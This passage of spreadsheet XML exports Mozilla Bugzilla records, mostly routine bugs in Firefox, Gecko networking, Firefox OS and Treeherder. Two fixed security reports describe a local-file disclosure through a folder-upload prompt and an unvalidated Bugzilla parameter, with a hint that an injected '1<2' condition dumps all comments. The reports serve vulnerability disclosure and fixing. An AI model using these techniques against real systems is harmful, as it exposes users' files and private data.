          <t>URL: hang when  [ is in scheme</t>
        </is>
      </c>
      <c r="D4292" t="inlineStr">
        <is>
          <t>2003-05-09 07:41:13 -0700</t>
        </is>
      </c>
      <c r="E4292" t="n">
        <v>1</v>
      </c>
      <c r="F4292" t="n">
        <v>1</v>
      </c>
      <c r="G4292" t="n">
        <v>3</v>
      </c>
      <c r="H4292" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4292" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4292" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K4292" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4292" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4292" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4292" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4292" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4292" t="inlineStr">
        <is>
          <t>[adt1 RTM][fixed trunk],custrtm-</t>
        </is>
      </c>
      <c r="Q4292" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4292" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4292" t="inlineStr">
        <is>
          <t>mozilla1.0.1</t>
        </is>
      </c>
      <c r="T4292" t="n">
        <v>1</v>
      </c>
      <c r="U4292" t="n">
        <v>0</v>
      </c>
      <c r="V4292" t="n">
        <v>26</v>
      </c>
      <c r="W4292" t="inlineStr">
        <is>
          <t>User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.9+)
Gecko/20020401
BuildID: 2002040103
Basically, you put [/] into the URL bar, press enter, sit back and watch.
I don't know why this happens... I'm assuming it's just a random weird bug. 
Also, I found it in 0.9.9, and only got this nightly to be sure it was still
there, so it's not something extremely new.
Reproducible: Always
Steps to Reproduce:
1. [/] in URL bar
2. &lt;ENTER&gt;
3. *thud*
Actual Results:  Mozilla stopped responding.
Expected Results:  Random error message.</t>
        </is>
      </c>
      <c r="X4292" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4293">
      <c r="A4293" t="n">
        <v>1113431</v>
      </c>
      <c r="B4293" t="inlineStr">
        <is>
          <t>2014-12-18 16:50:50 -0800</t>
        </is>
      </c>
      <c r="C4293" t="inlineStr">
        <is>
          <t>&lt;meta name="referrer"&gt; is ignored for navigations from the context menu and via a middle-click</t>
        </is>
      </c>
      <c r="D4293" t="inlineStr">
        <is>
          <t>2015-09-29 00:37:41 -0700</t>
        </is>
      </c>
      <c r="E4293" t="n">
        <v>1</v>
      </c>
      <c r="F4293" t="n">
        <v>1</v>
      </c>
      <c r="G4293" t="n">
        <v>2</v>
      </c>
      <c r="H4293" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4293" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4293" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4293" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4293" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4293" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4293" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4293" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4293" t="inlineStr">
        <is>
          <t>[adv-main38+]</t>
        </is>
      </c>
      <c r="Q4293" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4293" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4293" t="inlineStr">
        <is>
          <t>Firefox 39</t>
        </is>
      </c>
      <c r="T4293" t="n">
        <v>1</v>
      </c>
      <c r="U4293" t="n">
        <v>0</v>
      </c>
      <c r="V4293" t="n">
        <v>170</v>
      </c>
      <c r="W4293" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Steps to reproduce:
1. Open https://scholar.google.com/scholar?q=news&amp;mref=origin .
Middle-click on "Creating reality: How TV news distorts events" from ERIC to open the link in a new tab.
On the ERIC page, open the console and type document.referrer to see HTTP Referer.
2. Repeat 1, but left-click on the ERIC page to open it in the same tab, not a new tab.
3. Repeat 1, but from plain HTTP - http://scholar.google.com/scholar?q=news&amp;mref=origin .
Actual results:
1. document.referrer is empty - incorrect, HTTPS -&gt; HTTP in a new tab ignores meta referrer.
2. document.referrer = "https://scholar.google.com" - correct, HTTPS -&gt; HTTP in the same tab respects meta referrer.
3. document.referrer = "http://scholar.google.com" - correct, HTTP -&gt; HTTP in a new tab respects meta referrer.
Expected results:
1-2. document.referrer = "https://scholar.google.com".
3. document.referrer = "http://scholar.google.com".
Basically, it appears that the meta referrer implementation in Bug 704320 is incomplete.  When the source page is HTTPS, following a link to an HTTP page in the same tab respects meta referrer, but opening a link in a new tab does not.  Both cases respect meta-referrer when the source page is plain HTTP.
(Ditto for mref=unsafe-url - this is respected from HTTPS in the same tab, but not in a new tab.)</t>
        </is>
      </c>
      <c r="X4293" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4294">
      <c r="A4294" t="n">
        <v>1267276</v>
      </c>
      <c r="B4294" t="inlineStr">
        <is>
          <t>2016-04-25 08:14:28 -0700</t>
        </is>
      </c>
      <c r="C4294" t="inlineStr">
        <is>
          <t>Create a Hindsight output that can dynamically filter a Heka protobuf stream</t>
        </is>
      </c>
      <c r="D4294" t="inlineStr">
        <is>
          <t>2018-10-15 11:08:31 -0700</t>
        </is>
      </c>
      <c r="E4294" t="n">
        <v>1</v>
      </c>
      <c r="F4294" t="n">
        <v>1</v>
      </c>
      <c r="G4294" t="n">
        <v>6</v>
      </c>
      <c r="H4294" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4294" t="inlineStr">
        <is>
          <t>Cloud Services Graveyard</t>
        </is>
      </c>
      <c r="J4294" t="inlineStr">
        <is>
          <t>Metrics: Pipeline</t>
        </is>
      </c>
      <c r="K4294" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4294" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4294" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4294" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4294" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4294" t="inlineStr"/>
      <c r="Q4294" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4294" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4294" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4294" t="n">
        <v>1</v>
      </c>
      <c r="U4294" t="n">
        <v>0</v>
      </c>
      <c r="V4294" t="n">
        <v>2</v>
      </c>
      <c r="W4294" t="inlineStr">
        <is>
          <t>- Listens on a socket
- Accepts a message matcher
- Streams matching messages until the socket is closed</t>
        </is>
      </c>
      <c r="X4294" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4295">
      <c r="A4295" t="n">
        <v>888150</v>
      </c>
      <c r="B4295" t="inlineStr">
        <is>
          <t>2013-06-27 21:48:08 -0700</t>
        </is>
      </c>
      <c r="C4295" t="inlineStr">
        <is>
          <t>[MMS][Regression] Header actions are not working properly.</t>
        </is>
      </c>
      <c r="D4295" t="inlineStr">
        <is>
          <t>2013-10-16 00:59:56 -0700</t>
        </is>
      </c>
      <c r="E4295" t="n">
        <v>1</v>
      </c>
      <c r="F4295" t="n">
        <v>1</v>
      </c>
      <c r="G4295" t="n">
        <v>6</v>
      </c>
      <c r="H4295" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4295" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J4295" t="inlineStr">
        <is>
          <t>Gaia::SMS</t>
        </is>
      </c>
      <c r="K4295" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4295" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M4295" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N4295" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4295" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4295" t="inlineStr">
        <is>
          <t xml:space="preserve">[u=commsapps-user c=messaging p=0], [LeoVB+] </t>
        </is>
      </c>
      <c r="Q4295" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4295" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4295" t="inlineStr">
        <is>
          <t>1.1 QE4 (15jul)</t>
        </is>
      </c>
      <c r="T4295" t="n">
        <v>1</v>
      </c>
      <c r="U4295" t="n">
        <v>0</v>
      </c>
      <c r="V4295" t="n">
        <v>27</v>
      </c>
      <c r="W4295" t="inlineStr">
        <is>
          <t>A lot of issues here....
STR1:
- Send a SMS to '123123123'
- See the thread
- Tap on the header
- See the list of options
- Tap on 'Call'
EXPECTED:
- You can call to '123123123' from the dialer
CURRENTLY:
- Nothing happens
STR2:
- Send a SMS to '123123123'
- See the thread
- Tap on the header
- See the list of options
EXPECTED:
- 'send message' should be hidden, because you are in your own thread
CURRENTLY:
- 'send messag is there
STR2:
- Send a SMS to '123123123'
- See the thread
- Tap on the header
- See the list of options
EXPECTED:
- 'send message' should be hidden, because you are in your own thread
CURRENTLY:
- 'send message' is there
STR3:
- Send a SMS to a contact 'Manolo'
- See the thread
- Tap on the header
EXPECTED:
- You will go directly to the dialer for calling 'Manolo'
CURRENTLY:
- You see wrong options, and you can not go to dialer directly.</t>
        </is>
      </c>
      <c r="X4295" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4296">
      <c r="A4296" t="n">
        <v>1032437</v>
      </c>
      <c r="B4296" t="inlineStr">
        <is>
          <t>2014-06-30 13:46:56 -0700</t>
        </is>
      </c>
      <c r="C4296" t="inlineStr">
        <is>
          <t>Treeherder initial pageload is slower than TBPL</t>
        </is>
      </c>
      <c r="D4296" t="inlineStr">
        <is>
          <t>2015-05-20 04:25:41 -0700</t>
        </is>
      </c>
      <c r="E4296" t="n">
        <v>1</v>
      </c>
      <c r="F4296" t="n">
        <v>1</v>
      </c>
      <c r="G4296" t="n">
        <v>7</v>
      </c>
      <c r="H4296" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4296" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4296" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K4296" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4296" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4296" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4296" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4296" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4296" t="inlineStr"/>
      <c r="Q4296" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4296" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4296" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4296" t="n">
        <v>1</v>
      </c>
      <c r="U4296" t="n">
        <v>0</v>
      </c>
      <c r="V4296" t="n">
        <v>9</v>
      </c>
      <c r="W4296" t="inlineStr">
        <is>
          <t>1) With a warm browser cache, open https://treeherder.mozilla.org/ui/#/jobs?repo=mozilla-central
2) Time how long before pushes + results appear.
3) Repeat for https://tbpl.mozilla.org/
Expected:
Equal (or faster) time compared to TBPL.
Actual:
Treeherder takes ~8 seconds until any (and all) results appear.
TBPL displays all pushes + the first set of results after ~2.5 seconds, and all results by the time ~4.5 seconds have passed.
The TBPL pageload being incremental makes the perceived speed even faster, but even ignoring that, 8s vs 4.5s is still quite noticeable.</t>
        </is>
      </c>
      <c r="X4296" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4297">
      <c r="A4297" t="n">
        <v>123031</v>
      </c>
      <c r="B4297" t="inlineStr">
        <is>
          <t>2002-02-01 12:11:18 -0800</t>
        </is>
      </c>
      <c r="C4297" t="inlineStr">
        <is>
          <t>Setting username and password on nsIURI object damages host part of URL, preventing FTP transfer</t>
        </is>
      </c>
      <c r="D4297" t="inlineStr">
        <is>
          <t>2002-02-01 13:26:25 -0800</t>
        </is>
      </c>
      <c r="E4297" t="n">
        <v>1</v>
      </c>
      <c r="F4297" t="n">
        <v>1</v>
      </c>
      <c r="G4297" t="n">
        <v>3</v>
      </c>
      <c r="H4297" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4297" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4297" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K4297" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4297" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4297" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N4297" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4297" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4297" t="inlineStr"/>
      <c r="Q4297" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4297" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4297" t="inlineStr">
        <is>
          <t>mozilla0.9.9</t>
        </is>
      </c>
      <c r="T4297" t="n">
        <v>1</v>
      </c>
      <c r="U4297" t="n">
        <v>0</v>
      </c>
      <c r="V4297" t="n">
        <v>6</v>
      </c>
      <c r="W4297" t="inlineStr">
        <is>
          <t>While testing publishing on Composer, we found that we can FTP using an nsIURI
object whose "spec" includes the username and password, but if we set the 
username and password fields in the object, the FTP transfer fails.
Darin investigated this and found:
"nsIURI::host is getting wacked -- off by one error
nsIURI::host "@ftp.foo.com" becomes "@ftp.foo.co" after setting the username and
password"</t>
        </is>
      </c>
      <c r="X4297" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4298">
      <c r="A4298" t="n">
        <v>593036</v>
      </c>
      <c r="B4298" t="inlineStr">
        <is>
          <t>2010-09-02 07:41:27 -0700</t>
        </is>
      </c>
      <c r="C4298" t="inlineStr">
        <is>
          <t>Implement Revision comparison view/template</t>
        </is>
      </c>
      <c r="D4298" t="inlineStr">
        <is>
          <t>2011-04-07 10:25:58 -0700</t>
        </is>
      </c>
      <c r="E4298" t="n">
        <v>1</v>
      </c>
      <c r="F4298" t="n">
        <v>1</v>
      </c>
      <c r="G4298" t="n">
        <v>5</v>
      </c>
      <c r="H4298" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4298" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4298" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K4298" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4298" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4298" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4298" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4298" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4298" t="inlineStr"/>
      <c r="Q4298" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4298" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4298" t="inlineStr">
        <is>
          <t>2.3</t>
        </is>
      </c>
      <c r="T4298" t="n">
        <v>1</v>
      </c>
      <c r="U4298" t="n">
        <v>0</v>
      </c>
      <c r="V4298" t="n">
        <v>3</v>
      </c>
      <c r="W4298" t="inlineStr">
        <is>
          <t>http://people.mozilla.com/~chowse/drop/sumo/kb/v7/contributing/06_comparing_revisions.png</t>
        </is>
      </c>
      <c r="X4298" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4299">
      <c r="A4299" t="n">
        <v>1338637</v>
      </c>
      <c r="B4299" t="inlineStr">
        <is>
          <t>2017-02-10 11:01:10 -0800</t>
        </is>
      </c>
      <c r="C4299" t="inlineStr">
        <is>
          <t>Arbitrary local files disclosure in input[webkitdirectory]</t>
        </is>
      </c>
      <c r="D4299" t="inlineStr">
        <is>
          <t>2024-09-19 04:11:33 -0700</t>
        </is>
      </c>
      <c r="E4299" t="n">
        <v>1</v>
      </c>
      <c r="F4299" t="n">
        <v>1</v>
      </c>
      <c r="G4299" t="n">
        <v>3</v>
      </c>
      <c r="H4299" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4299" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4299" t="inlineStr">
        <is>
          <t>Widget</t>
        </is>
      </c>
      <c r="K4299" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L4299" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4299" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4299" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4299" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4299" t="inlineStr">
        <is>
          <t>[adv-main85+]</t>
        </is>
      </c>
      <c r="Q4299" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4299" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4299" t="inlineStr">
        <is>
          <t>85 Branch</t>
        </is>
      </c>
      <c r="T4299" t="n">
        <v>1</v>
      </c>
      <c r="U4299" t="n">
        <v>0</v>
      </c>
      <c r="V4299" t="n">
        <v>36</v>
      </c>
      <c r="W4299" t="inlineStr">
        <is>
          <t>Created attachment 8836171
poc.html
User Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Steps to reproduce:
Note: This was originally part of Bug 1319370 but this turned to be a separate bug deserving of its own report.
1. Open attached PoC
2. Hold down 'enter'
3. If the last used/default folder is 'my documents' (on windows) 
4. All the contents of that folder will be accessible without the explicit permission from the user.
( believe it's the case that this works on more folders in non-windows OS
Actual results:
Once a folder upload prompt appears, IFF a user was holding down the 'enter' key the last used directory/default (if they are within 'My Documents' folder or similar) we are able to trick the user into giving us access to all the files in my documents.
Expected results:
The folder upload button should be blurred from.</t>
        </is>
      </c>
      <c r="X4299" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4300">
      <c r="A4300" t="n">
        <v>649683</v>
      </c>
      <c r="B4300" t="inlineStr">
        <is>
          <t>2011-04-13 10:17:34 -0700</t>
        </is>
      </c>
      <c r="C4300" t="inlineStr">
        <is>
          <t>talos-r3-fed64-004 failed a Talos svg job with a weird sudo error</t>
        </is>
      </c>
      <c r="D4300" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4300" t="n">
        <v>1</v>
      </c>
      <c r="F4300" t="n">
        <v>1</v>
      </c>
      <c r="G4300" t="n">
        <v>5</v>
      </c>
      <c r="H4300" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4300" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4300" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4300" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4300" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4300" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4300" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4300" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4300" t="inlineStr">
        <is>
          <t>[slavealloc]</t>
        </is>
      </c>
      <c r="Q4300" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4300" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4300" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4300" t="n">
        <v>1</v>
      </c>
      <c r="U4300" t="n">
        <v>0</v>
      </c>
      <c r="V4300" t="n">
        <v>7</v>
      </c>
      <c r="W4300" t="inlineStr">
        <is>
          <t>See URL, relevant bits:
bash -c 'sudo hwclock --set --date="$(date +%m/%d/%y\ %H:%M:%S)"'
&lt;snip&gt;
sudo: sorry, you must have a tty to run sudo
program finished with exit code 1</t>
        </is>
      </c>
      <c r="X4300" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4301">
      <c r="A4301" t="n">
        <v>1384841</v>
      </c>
      <c r="B4301" t="inlineStr">
        <is>
          <t>2017-07-26 23:57:57 -0700</t>
        </is>
      </c>
      <c r="C4301" t="inlineStr">
        <is>
          <t>Match the style of the UITour highlights with Photon style guide</t>
        </is>
      </c>
      <c r="D4301" t="inlineStr">
        <is>
          <t>2017-10-10 08:46:11 -0700</t>
        </is>
      </c>
      <c r="E4301" t="n">
        <v>1</v>
      </c>
      <c r="F4301" t="n">
        <v>1</v>
      </c>
      <c r="G4301" t="n">
        <v>2</v>
      </c>
      <c r="H4301" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4301" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4301" t="inlineStr">
        <is>
          <t>Tours</t>
        </is>
      </c>
      <c r="K4301" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4301" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4301" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4301" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4301" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4301" t="inlineStr">
        <is>
          <t xml:space="preserve"> [photon-onboarding]</t>
        </is>
      </c>
      <c r="Q4301" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4301" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4301" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T4301" t="n">
        <v>1</v>
      </c>
      <c r="U4301" t="n">
        <v>0</v>
      </c>
      <c r="V4301" t="n">
        <v>42</v>
      </c>
      <c r="W4301" t="inlineStr">
        <is>
          <t>Current highlights style on toolbar and menu (those triggered by clicking the CTA on the onboarding tour) are not aligned well with the Photon style guideline. We'll need to refine them to provide a consistent visual experience in 57</t>
        </is>
      </c>
      <c r="X4301" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4302">
      <c r="A4302" t="n">
        <v>109690</v>
      </c>
      <c r="B4302" t="inlineStr">
        <is>
          <t>2001-11-11 21:09:57 -0800</t>
        </is>
      </c>
      <c r="C4302" t="inlineStr">
        <is>
          <t>[security] longlist.cgi doesn't check that $bug is valid</t>
        </is>
      </c>
      <c r="D4302" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:27 -0800</t>
        </is>
      </c>
      <c r="E4302" t="n">
        <v>1</v>
      </c>
      <c r="F4302" t="n">
        <v>1</v>
      </c>
      <c r="G4302" t="n">
        <v>4</v>
      </c>
      <c r="H4302" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4302" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4302" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K4302" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L4302" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4302" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4302" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4302" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4302" t="inlineStr">
        <is>
          <t>applied to 2.14.1</t>
        </is>
      </c>
      <c r="Q4302" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4302" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4302" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T4302" t="n">
        <v>1</v>
      </c>
      <c r="U4302" t="n">
        <v>0</v>
      </c>
      <c r="V4302" t="n">
        <v>26</v>
      </c>
      <c r="W4302" t="inlineStr">
        <is>
          <t>See above url, again made more complicated to avoid stalling bmo. This one comes
very close to giving up the comments, too, but fails the attachments table
lookup with an invalid column id. You can get arround that by adding something
like 1&lt;2, but then you get every single comment in the db. You don't want that :)
patch coming</t>
        </is>
      </c>
      <c r="X4302" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4303">
      <c r="A4303" t="n">
        <v>1384554</v>
      </c>
      <c r="B4303" t="inlineStr">
        <is>
          <t>2017-07-26 06:01:15 -0700</t>
        </is>
      </c>
      <c r="C4303" t="inlineStr">
        <is>
          <t>Main tab names from preferences are not visible on Windows 7,  when using a High Contrast theme</t>
        </is>
      </c>
      <c r="D4303" t="inlineStr">
        <is>
          <t>2017-10-10 19:52:00 -0700</t>
        </is>
      </c>
      <c r="E4303" t="n">
        <v>1</v>
      </c>
      <c r="F4303" t="n">
        <v>1</v>
      </c>
      <c r="G4303" t="n">
        <v>2</v>
      </c>
      <c r="H4303" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4303" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4303" t="inlineStr">
        <is>
          <t>Settings UI</t>
        </is>
      </c>
      <c r="K4303" t="inlineStr">
        <is>
          <t>56 Branch</t>
        </is>
      </c>
      <c r="L4303" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4303" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4303" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4303" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4303" t="inlineStr">
        <is>
          <t>[photon-preference]</t>
        </is>
      </c>
      <c r="Q4303" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4303" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4303" t="inlineStr">
        <is>
          <t>Firefox 56</t>
        </is>
      </c>
      <c r="T4303" t="n">
        <v>1</v>
      </c>
      <c r="U4303" t="n">
        <v>0</v>
      </c>
      <c r="V4303" t="n">
        <v>12</v>
      </c>
      <c r="W4303" t="inlineStr">
        <is>
          <t>Created attachment 8890342
High Contrast issue win 7.png
[Affected versions]: 
Nightly 56.0a1, Build ID 20170723100358
[Affected platforms]:
Platforms: Windows 7 x 64 
[Steps to reproduce]:
1. In Windows 7 go to Control Panel\All Control Panel Items\Personalization and select High Contrast Theme
2. Launch Nightly
3. Go to "about:preferences" and check the main tabs content
4. Go to Firefox Account tab
[Expected result]:
Preferences main Tabs(Icon and name) should be properly displayed on Windows 7, when using a High contrast theme (screenshot section 2)
Android and iOS Logos are properly displayed when using a High contrast theme(screenshot section 3)
[Actual result]:
Main Tabs names from preferences are not visible on Windows 7, when using a High Contrast theme
Android and iOS Logos are not visible when using a High contrast theme
Also, please note that the "Privacy &amp; Security" tab icon and name is not visible at all when High Contrast theme is enabled(screenshot section 1)
For more details please check the attached screenshot. Thank you</t>
        </is>
      </c>
      <c r="X4303" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4304">
      <c r="A4304" t="n">
        <v>380833</v>
      </c>
      <c r="B4304" t="inlineStr">
        <is>
          <t>2007-05-15 20:16:01 -0700</t>
        </is>
      </c>
      <c r="C4304" t="inlineStr">
        <is>
          <t>Crash during GC after uneval (involves E4X, mysterious sharp variable)</t>
        </is>
      </c>
      <c r="D4304" t="inlineStr">
        <is>
          <t>2008-06-11 01:53:33 -0700</t>
        </is>
      </c>
      <c r="E4304" t="n">
        <v>1</v>
      </c>
      <c r="F4304" t="n">
        <v>1</v>
      </c>
      <c r="G4304" t="n">
        <v>3</v>
      </c>
      <c r="H4304" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4304" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4304" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
